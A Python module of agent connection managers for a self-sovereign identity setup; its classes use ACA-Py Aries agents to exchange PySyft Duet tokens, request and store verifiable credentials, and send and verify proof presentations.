"""Provides managers specific to SSI / Trust Triangle roles.
AgentConnectionManager (ACM) is a based on PySyft's DuetCredentialExchanger Class. The class helps to manage aries
agents, send messages, and establish aries and duet connections. Specifically, active aries connections are
used to establish duet connections. The subclasses (RelyingParty, CredentialHolder, IssuingAuthority) have
functionalities that are specific to their roles in the trust triangle (e.g., only IssuingAuthority can issue
verifiable credentials).
Note: there are two types of connections
(1) Aries Connections (via ACA-PY agents) to send messages and exchange verifiable credentials
(2) Duet Connections (via PySyft's Duet) to exchange data and host an encrypted database
The Aries Connections are established by manually exchanging an invitation (e.g., QR-code or json posted online or
sent via E-Mail). Then, messages are sent via the Aries Connection to establish Duet Connections.
"""
# Standard libraries and 3rd party packages
import ast
import asyncio
import json
import time
from typing import Dict as TypeDict
from typing import Optional
from typing import Tuple
from typing import Union
import nest_asyncio
import requests
# from libs.aries_basic_controller import AriesAgentController
from aries_cloudcontroller import AriesAgentController
from pprintpp import pprint
from syft.grid.duet.exchange_ids import DuetCredentialExchanger
# local sources
from .connection import Connection
from .helpers import *
from .message import Message
nest_asyncio.apply()
class AgentConnectionManager(DuetCredentialExchanger): # dce
def __init__(self, agent_controller: AriesAgentController) -> None:
"""
Initialize the AgentConnectionManager (ACM). The class builds on top of the DuetCredentialExchanger
(see https://github.com/OpenMined/PySyft/blob/7049ca017cf26074518c02d4891283c6e1101df5/packages/syft/src/syft/grid/duet/exchange_ids.py),
which is defined by the PySyft package. A DuetCredentialExchanger allows to exchange Duet Tokens
to initiate a Duet connection.
Args:
agent_controller:
"""
super().__init__() # Initiate DuetCredentialExchanger
self.agent_controller = agent_controller # For aries agent
self.agent_listeners = [
{"topic": "connections", "handler": self._connections_handler},
{"topic": "basicmessages", "handler": self._messages_handler},
]
self.connections: TypeDict = {} # Dict of connections established with agent_controller {connection_id : Connection}
self.messages: [Message] = [] # List of messages agent_controller received
self.role: Optional[str] = None # Role of agent controller (e.g., RelyingParty)
self.duet_connection_id: Optional[str] = None # ID of connection through which to establish a Duet connection
def run(self, credential: str = "") -> Optional[str]:
"""
Default function required for any subclass of DuetCredentialExchanger. Defines what credential_exchanger (i.e.,
agent_controller) should do when they initiate or join a Duet connection. Uses the connection_id previously
set as self.duet_connection_id
Args:
credential: duet token obtained from the Duet network
(see https://github.com/OpenMined/PySyft/blob/f4717d2944593460df9b431e9143c1d1208dc45d/packages/syft/src/syft/grid/duet/__init__.py)
Returns: responder_id (duet token of duet partner who initiated the duet connection)
OR client_id (duet token of duet partner who is joining the duet connection)
"""
# Get duet_connection and set duet_token to duet token (self.duet_connection_id is set in agents' notebooks beforehand)
self._update_connection(connection_id=self.duet_connection_id, token=credential)
# Process if agent is joining the duet connection:
if self.join:
self._duet_invitee_exchange(credential=credential)
return self.responder_id
# Process if agent is initiating the duet connection:
else:
client_id = self._duet_inviter_exchange(credential=credential)
return client_id
def get_duet_connection(self) -> Connection:
"""
Gets Aries connection over which a Duet connection is being established
Returns: Connection
"""
return self.get_connection(self.duet_connection_id)
def get_duet_connections(self) -> [Connection]:
"""
Get all Aries Connections thorugh which a Duet Connection is established
Returns: list of Connections
"""
return [c for _id, c in self.connections.items() if c.is_duet_connection is True]
def _duet_inviter_exchange(self, credential: str) -> str:
"""
Proceed to initiate Duet connection as an inviter: (1) send credential (i.e., duet_token) to duet partner and
(2) await the duet token of the joining duet partner
Args:
credential: duet token of the agent herself
Returns: duet_token_partner is the duet token of the duet partner
"""
# Get duet connection
duet_conn = self.get_duet_connection()
# Send credential (i.e., duet token) to the joining duet partner
self._send_duet_token(credential, 1, duet_conn)
# Await the response of the duet partner (i.e., another duet token)
token_partner = self._await_partner_duet_token(2, duet_conn)
return token_partner
def _duet_invitee_exchange(self, credential: str) -> None:
"""
Proceed to join a Duet connection as an invitee: (1) Await duet token of inviting partner, (2) reset responder
ID (because otherwise it is only set as ""), and send duet token to the inviting party.
Args:
credential: duet token of invitee
Returns: -
"""
# Get duet connection
duet_conn = self.get_duet_connection()
token_partner = duet_conn.duet_token_partner
# Await duet_token_partner if the inviting duet partner has not yet sent a duet token,
# or Future() is already initiated
if token_partner is None or token_partner is asyncio.Future():
token_partner = self._await_partner_duet_token(1, duet_conn)
# Else print that a duet token was already received
else:
print("\n♫♫♫ >", colored("STEP 1:", attrs=["bold"]), "Obtained Duet Token {c}".format(c=token_partner))
print("♫♫♫ > from Duet Partner {n}".format(n=duet_conn.connection_with))
print("♫♫♫ > via Connection ID {cid}".format(cid=duet_conn.connection_id))
# Reset responder_id (of DuetCredentialExchanger) to the duet token obtained by the partner -> relevant for
# the proper functionality of the DuetCredentialExchanger
self.set_responder_id(token_partner)
# Send duet token to initiating duet partner
self._send_duet_token(credential, 2, duet_conn)
print("\n♫♫♫ > ...waiting for partner to connect...")
def _send_duet_token(self, credential: str, step: int, duet_conn: Connection) -> None:
"""
Send duet token to partner and print information
Args:
credential: duet token that should be sent
step: step number (so internal function can be used in different situations)
duet_conn: Aries connection over which a Duet Connection is established
Returns: -
"""
# Send duet token to duet partner
print("\n♫♫♫ >", colored("STEP {n}:".format(n=str(step)), attrs=["bold"]),
"Sending Duet Token {c}".format(c=credential))
print("♫♫♫ > to Duet Partner {n}".format(n=duet_conn.connection_with))
print("♫♫♫ > via Connection ID {cid}".format(cid=self.duet_connection_id))
self.send_message(self.duet_connection_id, "Duet Token : {c}".format(c=credential), duet_print=True)
def _await_partner_duet_token(self, step: int, duet_conn: Connection) -> str:
"""
Await duet token from partner and print information
Args:
credential: duet token that should be sent
step: step number to print function call as correct step
duet_conn: Aries connection over which a Duet Connection is established
Returns: -
"""
# Set Duet Token to asyncio.Future() (i.e. we are awaiting a result) and wait until it is set
print("\n♫♫♫ >", colored("STEP {n}:".format(n=str(step)), attrs=["bold"]),
"Awaiting Duet Token from Duet Partner...")
if duet_conn.duet_token_partner is None:
self._update_connection(connection_id=duet_conn.connection_id, token_partner=asyncio.Future())
# Wait until duet_token_partner is set a Future() with status "Finished"
loop = asyncio.get_event_loop()
duet_token_partner = loop.run_until_complete(duet_conn.duet_token_partner)
# Print duet_token_partner info and return
print("\n♫♫♫ >", colored("DONE!", COLOR_SUCCESS, attrs=["bold"]), "Partner's Duet Token:",
str(duet_token_partner))
return str(duet_token_partner)
def get_connection(self, connection_id: str) -> Optional[Connection]:
"""
Get connection by connection_id
Returns: Connection (if it exists) or None
"""
for _id, connection in self.connections.items():
if _id == connection_id:
return connection
return None
def get_connections(self) -> list[Optional[Connection]]:
"""
Returns: Get all connections of the agent
"""
return list(self.connections.values())
def get_active_connections(self) -> list[Optional[Connection]]:
"""
Get all connections where Connection.is_active = True
Returns: list of active connections
"""
return [c for _id, c in self.connections.items() if c.is_active is True]
def get_connection_id(self, agent_name: str) -> list[Optional[Connection]]:
"""
Returns list of connection IDs with a particular agent
Args:
agent_name: name of agent with whom the connection is shared
Returns: list of connection ids shared with agent_name
"""
connection_ids = [_id for _id, c in self.connections.items() if c.connection_with == agent_name]
return connection_ids
def _update_connection(self,
connection_id: str,
auto_accept: Optional[bool] = None,
auto_ping: Optional[bool] = None,
alias: Optional[str] = None,
connection_with: Optional[str] = None,
is_active: Optional[bool] = None,
is_duet_connection: Optional[bool] = None,
token_partner: Optional[str] = None,
token: Optional[str] = None,
reset_duet: bool = False
) -> Connection:
"""
Verify if connection_id exists already. If yes, update and return it.
Else, add it to self.connections, configure it, and return it.
Args:
connection_id: connection_id
auto_accept: whether connection is auto_accepted or not
auto_ping: whether connection should be auto_pinged or not
alias: whether connection has an alias or not
Returns: Connection (either new or updated)
"""
# Get conn. If conn does not yet exist, this will return None
conn = self.get_connection(connection_id)
# Else create a new conn
if conn is None:
conn = Connection(connection_id)
# Update variables of conn
if auto_accept is not None:
conn.auto_accept = auto_accept
if auto_ping is not None:
conn.auto_ping = auto_ping
if alias is not None:
conn.alias = alias
if is_active is not None:
conn.is_active = is_active
if connection_with is not None:
conn.connection_with = connection_with
if is_duet_connection is not None:
conn.is_duet_connection = is_duet_connection
self.duet_connection_id = connection_id
update_future = False
# Reset all duet configurations if reset
if reset_duet is True:
self.duet_connection_id = None if is_duet_connection is None else connection_id
conn.is_duet_connection = False if is_duet_connection is None else is_duet_connection
# Do not update duet_token_partner if duet_token is None (because then the duet_token_partner value might
# be the value we just obtained from the duet partner)
if (conn.duet_token is not None) and (conn.duet_token_partner is not None):
conn.duet_token_partner = None
conn.duet_token = None
else:
if token is not None:
conn.duet_token = token
conn.is_duet_connection = True
self.duet_connection_id = connection_id
if token_partner is not None:
conn.is_duet_connection = True
self.duet_connection_id = connection_id
# Else, set duet_token_partner as string
if conn.duet_token_partner is None:
conn.duet_token_partner = token_partner
else:
update_future = True # boolean to remember we need to execute this at the end
# Add or update connection to self.connections
self.connections[connection_id] = conn
# Execute after udpating most of the dictionary, because "set_result" will trigger the _await_ function to run
if update_future:
try:
self.connections[connection_id].duet_token_partner.set_result(token_partner)
except:
self.connections[connection_id].duet_token_partner = token_partner
return self.connections[connection_id]
def get_message(self, message_id: Optional[str] = None) -> Optional[Message]:
"""
Get connection by connection_id
Returns: Print of message
"""
# Get message ID if it was not provided
if message_id is None:
print(colored("Please enter Message ID :", COLOR_INPUT, attrs=["bold"]),
colored("(Check agent.verify_inbox() if you do not know the message ID)", COLOR_INPUT))
message_id = input(colored("ID: ", COLOR_INPUT))
# Iterate through messages and print message with message_id
for message in self.messages:
if message.message_id == message_id:
print("\n---------------------------------------------------------------------")
print(colored("Message received", attrs=["bold"]))
print("Connection ID : ", message.connection_id)
print("Message ID : ", message.message_id)
print("State : ", message.state)
print("Time : ", message.sent_time)
print("Text : ", colored(message.content, COLOR_INFO))
print("---------------------------------------------------------------------")
return message
return None
def get_messages(self) -> list[Optional[Message]]:
"""
Returns: Get all messages of the agent
"""
return self.messages
def verify_inbox(self) -> list[Optional[Message]]:
"""
Prints all available messages received, grouped by Connection ID
Returns: list of all message IDs
"""
print("\n---------------------------------------------------------------------")
print(colored("Message Inbox", attrs=["bold"]))
if len(self.messages) == 0:
print("> Inbox empty")
else:
unique_c_ids = [m.connection_id for m in self.messages]
for c_id in set(unique_c_ids):
m_ids = [m.message_id for m in self.messages if m.connection_id == c_id]
print("> {count} Message(s) via Connection ID {cid}:".format(count=unique_c_ids.count(c_id), cid=c_id))
for m_id in m_ids:
print("\t * Message ID : ", m_id)
print("---------------------------------------------------------------------")
return [m.message_id for m in self.messages]
def get_role(self) -> str:
"""
Get the VC / SSI Role of the agent
Returns: string decribing the VC / SSI Role of the agent
"""
return self.role
def get_agent_listeners(self) -> list[dict]:
"""
Returns: Get all agent_listeners of the agent
"""
return self.agent_listeners
def get_credentials(self):
"""
Get all credentials that the agent controller has stored in their wallet
Returns: list of all credentials (i.e., VCs)
"""
loop = asyncio.get_event_loop()
credentials = loop.run_until_complete(
self.agent_controller.credentials.get_all()
)
return credentials
def create_connection_invitation(self, alias: Optional[str] = None, auto_accept: bool = True, public: bool = False,
multi_use: bool = False, auto_ping: bool = True) -> Union[str, dict]:
"""
Creates invitation by agent_controller, and prints the invitation that must be forwarded to an external agent.
In case arguments are conservative (i.e., auto_accept = False), the function prompts the user to make
decisions right away whether to accept the external agent's response to the invitation.
Args:
alias: Alias name for invited connection
auto_accept: auto-accept the responses sent by the external agent
public: Use public DID
multi_use: Use invitation for multiple invitees
auto_ping: Automatically ping connection
Returns: connection_id of invitation
"""
# Loop until connection is created
loop = asyncio.get_event_loop()
invitation_response = loop.run_until_complete(
self.agent_controller.connections.create_invitation(str(alias).lower(), str(auto_accept).lower(),
str(public).lower(), str(multi_use).lower())
)
# Get connection_id and store as new connection in self (or update existing connection)
connection_id = invitation_response["connection_id"]
conn = self._update_connection(connection_id=connection_id, auto_accept=auto_accept, auto_ping=auto_ping,
alias=alias)
# Print invitation to share it with an external agent
invitation = invitation_response["invitation"]
print(colored("\nCopy & paste invitation and share with external agent(s):", COLOR_INPUT, attrs=["bold"]))
pprint(invitation)
# Return whole invitation if multi_use is true (to be able to store it)
if multi_use is True:
return invitation
# Return only connection_id (as there is only one when multi_use is false)
else:
return connection_id
def receive_connection_invitation(self, alias: Optional[str] = None, auto_accept: bool = True,
auto_ping: bool = True) -> str:
"""
Function to respond to a connection invitation received by an external agent
Args:
alias: name for the connection
auto_accept: Automatically accept the reponse by the inviting external agent
auto_ping: Automatically ping agent on other end of connection
Returns: connection_id of connection (as string)
"""
# Ask user to paste invitation from external agent
print(colored("Please enter invitation received by external agent:", COLOR_INPUT, attrs=["bold"]))
invitation = input(colored("Invitation: ", COLOR_INPUT))
invitation = ast.literal_eval(invitation) # Convert string invitation from input into a dict
# Loop until connection invitation is received
loop = asyncio.get_event_loop()
invitation_response = loop.run_until_complete(
self.agent_controller.connections.receive_invitation(invitation, alias, str(auto_accept).lower())
)
# Get connection_id and store as a new connection in self
connection_id = invitation_response["connection_id"]
conn = self._update_connection(connection_id=connection_id, auto_accept=auto_accept, auto_ping=auto_ping,
alias=alias)
# Ask user to accept invitation if auto_accept is set to False
self._accept_connection_invitation(connection_id, auto_accept=auto_accept)
return connection_id
def _accept_connection_invitation(self, connection_id: str, auto_accept: bool = True, label: Optional[str] = None,
endpoint=None) -> None:
"""
Accept the connection invitation sent by an external agent
Args:
connection_id: connection id of invitation
label: own label for invitation
endpoint: own endpoint
Returns: -
"""
if auto_accept is False:
choice = get_choice("Accept invitation {c}?".format(c=connection_id),
no_text="Please execute agent_controller.connections.accept_invitation(connection_id) to proceed")
if choice is True:
# Loop until connection invitation is received
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.connections.accept_invitation(connection_id, label, endpoint)
)
def _accept_invitation_response(self, connection_id: str, auto_accept: bool = True) -> None:
"""
Accept the response sent by an external agent (usually through _accept_conneciton_invitation) as a result of an invitation sent by the self.agent_controller
Args:
connection_id: connection id of the invitation sent
auto_accept: auto accept invitation or not
Returns: -
"""
# Do nothing if auto_accept is True (agent does it automatically)
# If auto_accept is False, prompt user to accept request
if auto_accept is False:
choice = get_choice("Accept invitation request response by external agent?",
"Please execute agent_controller._accept_connection_invitation() to proceed")
if choice is True:
# Loop until connection invitation is received
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.connections.accept_request(connection_id)
)
def _trust_ping(self, connection_id: str, auto_ping: bool) -> None:
"""
Send trust_ping to external agent to finalize the connection after sending an invitation
Args:
connection_id:
Returns:
"""
# Prompt user to decide whether to sent a trust ping or not
if auto_ping is False:
choice = get_choice("Send trust ping to finalize connection?",
no_text="Please execute agent_controller._trust_ping(connection_id) to finalize the connection")
if choice is True:
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.messaging.trust_ping(connection_id, "Send trust ping")
)
else:
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.messaging.trust_ping(connection_id, "Send automated trust ping")
)
def _accept_invitation_request(self, connection_id: str, auto_accept: bool) -> None:
"""
Accept invitation request if auto_accept is False
Args:
connection_id:
auto_accept:
Returns:
"""
# Do nothing if auto_accept is True (agent does it automatically)
# If auto_accept is False, prompt user to accept request
# @todo: verify why this does not work!!!
if auto_accept is False:
# print(colored("Accept invitation request?", COLOR_INPUT))
# choice = input("Please respond [yes/no] ")
# choice = True if choice == "yes" else False
#
# #choice = get_choice("Accept invitation request?", "Did not accept invitation request.")
# if choice is True:
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.connections.accept_request(connection_id)
)
def send_message(self, connection_id: str, basic_message: str, duet_print: bool = False) -> None:
"""
Send basic message between agent and another external agent at the other end of the connection
Args:
connection_id: id of connection over which to send a message
basic_message: message to be sent via conneciton with connection_id
Returns: -
"""
# Loop until connection invitation is received
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.messaging.send_message(connection_id, basic_message)
)
if duet_print is True:
print(colored("♫♫♫ > Done!", COLOR_SUCCESS, attrs=["bold"]))
else:
print("Sent message via Connection ID {cid}".format(cid=connection_id))
def _connections_handler(self, payload: TypeDict) -> None:
"""
Handle incoming connections and print state information depending on the state of the incoming message.
Args:
payload: dictionary with information of incoming message
Returns: -
"""
state = payload['state']
connection_id = payload["connection_id"]
their_role = payload["their_role"]
routing_state = payload["routing_state"]
rfc_state = payload["rfc23_state"]
# Register new connection_id if it does not yet exist
if "alias" in payload:
conn = self._update_connection(connection_id=connection_id, alias=payload["alias"])
else:
conn = self._update_connection(connection_id=connection_id)
print("\n---------------------------------------------------------------------")
print(colored("Connection Webhook Event Received: Connections Handler", attrs=["bold"]))
print("Connection ID : ", connection_id)
print("State : ", colored("{s} ({r})".format(s=state, r=rfc_state), COLOR_INFO))
print("Routing State : {routing}".format(routing=routing_state))
if 'their_label' in payload:
their_label = payload['their_label']
print(f"Connection with : ", their_label)
conn = self._update_connection(connection_id=connection_id, connection_with=their_label)
print("Their Role : ", their_role)
print("---------------------------------------------------------------------")
if state == "active":
conn = self._update_connection(connection_id=connection_id, is_active=True)
print(colored("\nConnection ID: {0} is now active".format(connection_id), COLOR_SUCCESS, attrs=["bold"]))
elif rfc_state == "invitation-received":
self._accept_invitation_response(connection_id, conn.auto_accept)
elif rfc_state == "response-received":
self._trust_ping(connection_id, conn.auto_ping)
elif rfc_state == "request-received":
self._accept_invitation_request(connection_id, conn.auto_accept)
def _messages_handler(self, payload: TypeDict) -> None:
"""
Handles basicmessages that are received by webhook handler
Messages are processed as messages (appended to self.messages)
or as duet tokens (if "Duet Token" is in message content)
Args:
payload: webhook payload
Returns: -
"""
# Convert payload to message
message = Message(payload)
# If message is a duet token, process accordingly
if "Duet Token :" in message.content:
dci = message.content
dci = dci.replace("Duet Token : ", "")
# self.set_duet_config(message.connection_id, token=dci)
self._update_connection(connection_id=message.connection_id, token_partner=dci)
# Else store message in inbox (i.e., self.messages)
else:
self.messages.append(message)
class RelyingParty(AgentConnectionManager):
def __init__(self, agent_controller: AriesAgentController) -> None:
super(RelyingParty, self).__init__(agent_controller)
self.role = "RelyingParty"
self.agent_listeners.append({"topic": "present_proof", "handler": self._relying_party_proof_handler})
self.agent_controller.register_listeners(self.agent_listeners, defaults=False)
print(
colored("Successfully initiated AgentConnectionManager for a(n) {role} ACA-PY agent".format(role=self.role),
COLOR_SUCCESS, attrs=["bold"]))
def send_proof_request(self, connection_id: str, proof_request: TypeDict, comment: str) -> str:
"""
Send proof request to a credentialholder
Args:
connection_id: connection_id over which to request a proof
comment: comment for external agent
proof_request: dictionary with proof request information
Returns: presentation_exchange_id (needed to proceed with exchange of proof presentation)
"""
# Define entire request that will be sent to the external agent
whole_request = {
"comment": comment,
"connection_id": connection_id,
"proof_request": proof_request,
"trace": False
}
# Await response from sending the request
loop = asyncio.get_event_loop()
proof_req_response = loop.run_until_complete(
self.agent_controller.proofs.send_request(whole_request)
)
return proof_req_response["presentation_exchange_id"]
def verify_proof_presentation(self, presentation_exchange_id: str) -> bool:
"""
Verify if the proof presentation sent by an external agent is valid
Args:
presentation_exchange_id: id of presentation to be verified
Returns: whether proof presentation is valid or not
"""
loop = asyncio.get_event_loop()
verified_response = loop.run_until_complete(
self.agent_controller.proofs.verify_presentation(presentation_exchange_id)
)
print("\n---------------------------------------------------------------------")
print(colored("Presentation Exchange ID {pei}".format(pei=presentation_exchange_id), attrs=["bold"]))
# Print verified status
verified = bool(verified_response["verified"]) # States whether the proof is valid or not
verified_color = COLOR_SUCCESS if verified is True else COLOR_ERROR
print("Presentation valid : ", colored(verified, verified_color))
# Parse revealed attributes
print("Revealed Attributes : ")
for (name, val) in verified_response['presentation']['requested_proof']['revealed_attrs'].items():
attr_name = verified_response["presentation_request"]["requested_attributes"][name]["name"]
print("\t* {a} = {r}".format(a=attr_name, r=val['raw']))
# Parse self-attested attributes
print("Self-Attested Attributes : ")
for (name, val) in verified_response['presentation']['requested_proof']['self_attested_attrs'].items():
print("\t* {n} = {v}".format(n=name, v=val))
# Parse predicate attributes
print("Predicate Attributes : ")
for (name, val) in verified_response['presentation']['requested_proof']['predicates'].items():
print("\t* {n} = {v}".format(n=name, v=val))
print("---------------------------------------------------------------------")
return verified
def _relying_party_proof_handler(self, payload: TypeDict) -> None:
"""
Enriches proof_handler with states specific to the relying party
Args:
payload: payload of incoming connection
Returns: -
"""
role = payload["role"]
connection_id = payload["connection_id"]
pres_ex_id = payload["presentation_exchange_id"]
state = payload["state"]
print("\n---------------------------------------------------------------------")
print(colored("Connection Webhook Event Received: Present-Proof Handler", attrs=["bold"]))
print("Connection ID : ", connection_id)
print("Presentation Exchange ID : ", pres_ex_id)
print("Protocol State : ", colored("{s}".format(s=state), COLOR_INFO))
print("Agent Role : ", role)
print("Initiator : ", payload["initiator"])
print("---------------------------------------------------------------------")
# Store presentation_exchange_id to connection
conn = self.get_connection(connection_id)
if pres_ex_id not in conn.presentation_exchange_ids:
conn.presentation_exchange_ids.append(pres_ex_id)
if state == "request_sent":
print(colored("\nPresentation Request : ", attrs=["bold"]))
pprint(payload["presentation_request_dict"])
elif state == "verified":
print(colored("\nPresentation Exchange ID: {pei} is verified".format(pei=pres_ex_id), COLOR_SUCCESS,
attrs=["bold"]))
class CredentialHolder(AgentConnectionManager):
def __init__(self, agent_controller: AriesAgentController):
super(CredentialHolder, self).__init__(agent_controller)
self.role = "Holder"
self.agent_listeners.append({"topic": "present_proof", "handler": self._prover_proof_handler})
self.agent_listeners.append({"topic": "issue_credential", "handler": self._holder_handler})
self.agent_controller.register_listeners(self.agent_listeners, defaults=False)
print(
colored("Successfully initiated AgentConnectionManager for a(n) {role} ACA-PY agent".format(role=self.role),
COLOR_SUCCESS, attrs=["bold"]))
def is_vc_in_wallet(self, vc_referent: str) -> bool:
"""
Verifies if a verifiable credential named vc is within the wallet of an agent_controller
Storing a VC is done automatically if ACAPY_AUTO_STORE_CREDENTIAL=true in .env file
Args:
vc: referent of verifiable credential
Returns: True if VC is stored in wallet, False if it is not
"""
credentials = self.get_credentials()
if any(result["referent"] == vc_referent for result in credentials["results"]):
print(colored("Credential {vc} is stored in wallet.".format(vc=vc_referent), COLOR_SUCCESS))
return True
else:
print(colored(
"\nCredential {vc} is not stored in wallet.".format(
vc=vc_referent), COLOR_ERROR))
return False
def request_vc(self, connection_id: str, schema_id: str, auto_request: bool = False, auto_store: bool = False,
credential_id: Optional[str] = None) -> None:
"""
Fetch offer made by issuer and request record
Args:
auto_store: automatically store VC in wallet if True
auto_request: automatically request VC if True
schema_id: id of the schema agent wants a VC for
connection_id: connection id via which a vc was offered
Returns: -
"""
# Get all records to find the offer made by the external agent
loop = asyncio.get_event_loop()
records_response = loop.run_until_complete(
self.agent_controller.issuer.get_records(connection_id)
)
# Loop through records to find VC offer for schema_id
state = None
for record in records_response["results"]:
if record["schema_id"] == schema_id:
state = record["state"]
record_id = record["credential_exchange_id"]
break
# Return if no suitable offered vc was found
if state != "offer_received":
print(colored("Could not find requested VC offer", COLOR_ERROR, attrs=["bold"]))
return None
# See if user wants to request VC or not
if auto_request is False:
print(colored("\nRequest VC from offer", COLOR_INPUT, attrs=["bold"]))
choice = get_choice("Request VC", "VC will not be requested")
# Return None if user decided not to request VC
if choice is False:
print(colored("Did not request VC", COLOR_ERROR, attrs=["bold"]))
return None
else:
choice = False
# Send VC request (if conditions are given)
if (choice is True) or (auto_request is True):
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.issuer.send_request_for_record(record_id)
)
# Wait a little bit to see if handler sends message
time.sleep(3)
# Check if VC is stored. If not, store it
is_in_wallet = self.is_vc_in_wallet(record_id)
if is_in_wallet is False:
self._store_vc(record_id, auto_store, credential_id)
def _store_vc(self, record_id: str, auto_store: bool, referent: Optional[str] = None) -> None:
"""
Store VC. If auto_store is set to False, the user is prompted whether they want to store the VC or not.
Args:
record_id: ID of the VC that should be stored
auto_store: Does not prompt user to store wallet if True
referent: alias name for the VC
Returns:
"""
# Prompt user to store VC if auto_store is not set to True
if auto_store is False:
print(
colored("\nDo you want to store the VC with ID {i}?".format(i=record_id), COLOR_INPUT, attrs=["bold"]))
choice = get_choice("Store VC: ", "VC not stored.")
# Return none if user does not want to store VC
if choice is False:
print(colored("VC not stored", COLOR_ERROR, attrs=["bold"]))
return None
# Ask for referent if none is given
if referent is None:
print(colored("\nPlease provide a referent (like an ID) for the VC", COLOR_INPUT, attrs=["bold"]))
print(colored("(The referent acts as the identifier for retrieving the raw credential from the wallet)",
COLOR_INPUT))
referent = input(
colored("Referent: ".format(r=record_id), COLOR_INPUT))
# Store credential in wallet
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.issuer.store_credential(record_id, referent)
)
print(colored("Successfully stored credential with Referent {r}".format(r=referent), COLOR_SUCCESS,
attrs=["bold"]))
def prepare_presentation(self, connection_id: str, thread_id: Optional[str] = None,
state: str = "request_received", role: str = "prover") -> Tuple[dict, str]:
# Find all presentation records that were sent to you
loop = asyncio.get_event_loop()
proof_records_response = loop.run_until_complete(
self.agent_controller.proofs.get_records(connection_id, thread_id, state, role)
)
# Get most recent presentation_exchange_id and the corresponding proof_request
conn = self.get_connection(connection_id)
presentation_exchange_id = conn.presentation_exchange_ids[-1]
proof_request = \
[p for p in proof_records_response["results"] if p["presentation_exchange_id"] == presentation_exchange_id][
0]
print(colored("> Found proof_request with presentation_exchange_id {pei}".format(pei=presentation_exchange_id),
COLOR_INFO))
# Get requirements from proof_request
requirements = self._get_proof_request_requirements(proof_request)
print(colored("> Restrictions for a suitable proof: {r}".format(r=requirements), COLOR_INFO))
# Compare all VCs in the wallet of the CredentialHolder, and check if one of them satisfies the requirements of the proof_request
suitable_credentials, revealed = self._get_suitable_vc_for_proof(requirements)
# Prepare presentation that will be sent to the RelyingParty
predicates = {}
self_attested = {}
presentation = {
"requested_predicates": predicates,
"requested_attributes": revealed,
"self_attested_attributes": self_attested,
}
print(colored("> Generate the proof presentation : ", COLOR_INFO))
pprint(presentation)
return presentation, presentation_exchange_id
def send_proof_presentation(self, presentation_exchange_id: str, presentation: dict) -> None:
"""
Send proof presentation
Args:
presentation_exchange_id: id of presentation that should be sent
presentation: presentation to send
Returns: -
"""
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.proofs.send_presentation(presentation_exchange_id, presentation)
)
def _get_proof_request_requirements(self, presentation_record: dict) -> dict:
"""
Returns dictionary with {<required-attribute>: <restrictions-of-attribute>} from presentation record
Args:
presentation_record: presentation record received
Returns: dictionary with requirements
"""
# Setup
requirements = {}
presentation_request = presentation_record["presentation_request"]
# Get required attributes and requirements for the individual attributes
for attr_key, attr_val in presentation_request["requested_attributes"].items():
requirements[attr_val["name"]] = {}
requirements[attr_val["name"]]["requirements"] = attr_val["restrictions"][0]
requirements[attr_val["name"]]["request_attr_name"] = attr_key
return requirements
def _get_suitable_vc_for_proof(self, requirements: dict) -> Tuple[dict, dict]:
"""
Finds credentials amongst all credentials stored in the agent's wallet that satisfy the requirements provided by the relying party.
Args:
requirements:
Returns: dictionary with: {<attribute-name>: <suitable-credential>}, where the suitable-credential satisfies all requirements
"""
# Get all current credentials that will be considered when finding a suitable credential
loop = asyncio.get_event_loop()
credentials = loop.run_until_complete(
self.agent_controller.credentials.get_all()
)
# Setup
relevant_credentials = {}
revealed = {}
credentials = credentials["results"]
# Iterate through attribute name and attribute requirements of relying party
for name, conditions in requirements.items():
req = conditions["requirements"]
req_name = conditions["request_attr_name"]
# Skip credential if the required attribute name is not in any credential,
# or if all requirements (e.g., schema_id) are not within one credential
if (any(name in cred["attrs"] for cred in credentials) is False) or (
any(r in cred.keys() for r in req for cred in credentials) is False):
continue
# Iterate through credentials
for cred in credentials:
# Verify if requirement value (r_val) and credential value (cred[r_key]) match for required attribute (r_key)
for r_key, r_val in req.items():
try:
# Append cred to relevant_credentials if all requirements match
if (cred[r_key] == r_val) is True:
relevant_credentials[name] = cred
print(colored(
"> Attribute request for '{name}' can be satisfied by Credential with VC '{c}'".format(
name=name, c=cred["referent"]), COLOR_INFO))
revealed[req_name] = {"cred_id": cred["referent"], "revealed": True}
except Exception as e:
print(e)
return relevant_credentials, revealed
def _holder_handler(self, payload: TypeDict) -> None:
"""
Handle connections that are holder-specific
Args:
payload: dictionary with payload of incoming connection
Returns:
"""
# Get relevant attributes
connection_id = payload['connection_id']
exchange_id = payload['credential_exchange_id']
state = payload['state']
role = payload['role']
# Print
print("\n---------------------------------------------------------------------")
print(colored("Handle Issue Credential Webhook: Issue Credential Handler", attrs=["bold"]))
print(f"Connection ID : {connection_id}")
print(f"Credential exchange ID : {exchange_id}")
print("Agent Protocol Role : ", role)
print("Protocol State : ", colored(state, COLOR_INFO))
print("---------------------------------------------------------------------")
# Handle different states
if state == "offer_received":
proposal = payload["credential_proposal_dict"]["credential_proposal"]
print(colored("\nProposed Credential : ", attrs=["bold"]))
pprint(proposal)
elif state == "credential_acked":
credential = payload["credential"]
print(colored("\nReceived Credential :", attrs=["bold"]))
pprint(credential)
def _prover_proof_handler(self, payload: TypeDict) -> None:
"""
Handle incoming prover proof connections
Args:
payload: dictionary with payload of incoming connection
Returns: -
"""
# Get attributes
role = payload["role"]
connection_id = payload["connection_id"]
pres_ex_id = payload["presentation_exchange_id"]
state = payload["state"]
# Print
print("\n---------------------------------------------------------------------")
print(colored("Connection Webhook Event Received: Present-Proof Handler", attrs=["bold"]))
print("Connection ID : ", connection_id)
print("Presentation Exchange ID : ", pres_ex_id)
print("Protocol State : ", colored(state, COLOR_INFO))
print("Agent Role : ", role)
print("Initiator : ", payload["initiator"])
print("---------------------------------------------------------------------")
# Store presentation_exchange_id to connection
conn = self.get_connection(connection_id)
if pres_ex_id not in conn.presentation_exchange_ids:
conn.presentation_exchange_ids.append(pres_ex_id)
# Handle different states
if state == "request_received":
print(colored("Obtained Proof Request : ", attrs=["bold"]))
pprint(payload["presentation_request"])
